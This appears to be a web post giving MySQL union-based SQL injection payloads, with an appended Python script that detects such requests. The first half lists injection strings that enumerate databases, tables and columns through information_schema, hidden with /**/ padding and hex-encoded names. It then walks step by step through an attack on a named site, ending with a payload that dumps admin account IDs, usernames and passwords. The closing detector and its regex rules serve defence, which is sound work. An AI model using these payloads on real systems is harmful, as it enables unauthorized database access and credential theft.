Querying databases

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Querying tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<database name as hex>/**/limit/**/1,1

Querying columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<table name as hex>/**/limit/**/1,1

MySQL 5 advanced injection method: enumerating tables

Example:

1. Enumerating tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Stepping through the results this way, the admin_user table appeared at the fourth one.

2. Enumerating columns
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dumping the password
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
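
A defender-side check for the enumeration requests shown above, as an added example that is not part of the original post: it strips the /**/ comment padding, decodes hex string literals, and flags requests that combine UNION SELECT with an information_schema table. The function names, rule names and sample request lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

COMMENT = re.compile(r"/\*.*?\*/", re.S)             # closed inline comments such as /**/
HEX = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)  # hex literals used instead of quoted names
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(
        r"\binformation_schema\s*\.\s*(?:schemata|tables|columns)\b"),
    "open_comment_tail": re.compile(r"/\*\s*$"),     # trailing /* that cuts off the query
}
# Constructed request lines (hypothetical paths; payload shape taken from the post).
SAMPLES = [
    "/item.php?id=13240",
    "/item.php?id=-1/**/union/**/select/**/1,TABLE_NAME,3/**/from/**/information_schema.TABLES"
    "/**/where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*",
    "/search.php?q=student+union+select+committee",  # benign text that trips one rule
]

def normalize(url):
    """Return (canonical lower-case query text, list of decoded hex literals)."""
    text = unquote_plus(urlsplit(url).query)
    text = COMMENT.sub(" ", text)                    # comment padding becomes whitespace
    decoded = []
    def repl(match):
        raw = bytes.fromhex(match.group(1))
        if all(0x20 <= b <= 0x7E for b in raw):      # only printable ASCII counts as a name
            decoded.append(raw.decode("ascii"))
            return "'" + decoded[-1] + "'"
        return match.group(0)
    text = HEX.sub(repl, text)
    return re.sub(r"\s+", " ", text).strip().lower(), decoded

def check_request(url):
    """Flag only when UNION SELECT and an information_schema table appear together."""
    text, decoded = normalize(url)
    hits = sorted(name for name, rx in RULES.items() if rx.search(text))
    flagged = {"union_select", "information_schema"} <= set(hits)
    return {"flagged": flagged, "rules": hits, "decoded": decoded}

if __name__ == "__main__":
    for line in SAMPLES:
        print(check_request(line), line[:60])
```

Requiring both rules keeps the benign search request from alerting, and the decoded list shows which schema or table name was being targeted.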